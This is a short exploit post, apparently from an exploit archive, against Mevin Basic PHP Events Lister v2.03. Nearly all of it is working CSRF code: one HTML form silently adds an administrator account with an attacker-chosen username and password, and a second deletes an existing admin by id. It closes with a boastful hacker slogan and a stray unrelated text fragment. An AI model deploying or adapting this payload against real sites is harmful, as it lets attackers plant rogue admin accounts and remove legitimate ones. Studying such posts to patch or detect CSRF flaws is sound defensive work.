####################################################### # Author: Crazy_Hacker # Script: Mevin Basic PHP Events Lister v2.03 # Exploit type: CSRF Vulnerability [Add & Delete Admin] # Download: http://www.mevin.com/downloads/Basic-php-events-lister2.03.zip # Risk: High # Contact: jy8@hotmail.com ####################################################### <form name="setup" action="http://127.0.0.1/events2/admin/user_add.php" method="post"> <input name="uname" type="hidden" value="Crazy_Hacker" /> <input name="pword" type="hidden" value="PWNED!!" /> <input type=submit name=submit value="Add Admin"> </form> <form action="http://localhost/events2/admin/user_delete.php?id=8" method="post"> <input type="hidden" name="ud_id" value="8"> <input type="submit" name="submit" value="Delete Admin"> </form> \\// S3crity just Suck5 \\// #EOF
体验盒子
